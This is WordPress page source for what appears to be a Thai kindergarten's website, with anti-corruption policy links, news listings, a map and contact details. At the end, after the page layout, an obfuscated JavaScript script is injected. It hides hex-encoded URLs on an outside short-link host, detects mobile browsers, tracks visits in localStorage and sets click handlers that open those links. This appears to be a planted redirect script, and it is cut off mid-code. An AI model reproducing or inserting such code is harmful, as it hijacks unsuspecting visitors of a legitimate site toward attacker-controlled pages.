gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม  No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return 